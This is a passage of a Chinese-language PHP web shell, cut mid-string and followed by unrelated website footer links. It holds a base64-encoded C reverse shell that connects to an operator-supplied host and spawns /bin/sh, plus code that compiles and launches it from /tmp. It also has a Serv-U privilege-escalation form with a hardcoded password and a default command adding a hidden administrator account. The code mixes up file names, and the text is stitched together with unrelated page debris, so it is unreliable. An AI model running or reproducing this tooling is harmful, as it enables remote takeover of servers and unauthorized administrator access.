			echo Exec_Run($perlpath.\' /tmp/spider_bc \'.$_POST[\'yourip\'].\' \'.$_POST[\'yourport\'].\' &\') ? \'nc -l -n -v -p \'.$_POST[\'yourport\'] : \'执行命令失败\';
		}
		if($_POST[\'use\'] == \'c\')
		{
			$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
			"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
			"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
			"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
			"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
			"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
			"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
			"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
			echo File_Write(\'/tmp/spider_bc.c\',base64_decode($back_connect_c),\'wb\') ? \'创建/tmp/spider_bc.c成功<br>\' : \'创建/tmp/spider_bc.c失败<br>\';
			$res = Exec_Run(\'gcc -o /tmp/angel_bc /tmp/angel_bc.c\');
			@unlink(\'/tmp/spider_bc.c\');
			echo Exec_Run(\'/tmp/spider_bc \'.$_POST[\'yourip\'].\' \'.$_POST[\'yourport\'].\' &\') ? \'nc -l -n -v -p \'.$_POST[\'yourport\'] : \'执行命令失败\';
		}
		echo \'<br>你可以尝试连接端口 (nc -l -n -v -p \'.$_POST[\'yourport\'].\') </div>\';
	}
	return true;
}

//ServU提权

function Servu_l()
{
	$SUPass = isset($_POST[\'SUPass\']) ? $_POST[\'SUPass\'] : \'#l@$ak#.lk;0@P\';
print<<<END
<div class="actall"><a href="?s=l">[执行命令]</a> <a href="?s=l&o=adduser">[添加用户]</a></div>
<form method="POST">
	<div class="actall">ServU端口 <input name="SUPort" type="text" value="43958" style="width:300px"></div>
	<div class="actall">ServU用户 <input name="SUUser" type="text" value="LocalAdministrator" style="width:300px"></div>
	<div class="actall">ServU密码 <input name="SUPass" type="text" value="{$SUPass}" style="width:300px"></div>
END;
if($_GET[\'o\'] == \'adduser\')
{
print<<<END
<div class="actall">帐号 <input name="user" type="text" value="spider" style="width:200px">
密码 <input name="password" type="text" value="spider" style="width:200px">
目录 <input name="part" type="text" value="C:\\\\" style="width:200px"></div>
END;
}
else
{
print<<<END
<div class="actall">提权命令 <input name="SUCommand" type="text" value="net user spider spider /add & net localgroup administrators spider /add" style="width:600px"><br>
<input name="user" type="hidden" value="spider">
<input name="password" type="hidden" value="spider">
<input name="part" type="hidden" value="C:\\\\"></div>
END;
}
echo \'<div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form>\';
	if((!empty($_POST[\'SUPort\'])) && (!empty($_POST[\'SUUser\'])) && (!empty($_POST[\'SUPass\'])))
	{
		echo \'<div class="actall">\';
		$sendbuf = "";
		$recvbuf = "
客服电话

电子邮件

请发表评论

全部评论

上一篇：

下一篇：

CVE-2022-30221

rapidsai/cuml: cuML - RAPIDS Machine Lea

librespeed/speedtest: Self-hosted Speedt

avehtari/BDA_m_demos: Bayesian Data Anal

四维彩超怎么看性别？四维看男孩女孩诀窍

librespeed/speedtest: Self-hosted Speedt

avehtari/BDA_m_demos: Bayesian Data Anal

四维彩超怎么看性别？四维看男孩女孩诀窍

CVE-2022-26113

medfreeman/markdown-it-toc-and-anchor: m

nuwave/lighthouse: A framework for servi

关于我们

产品与服务

解决方案

139-2527-9053
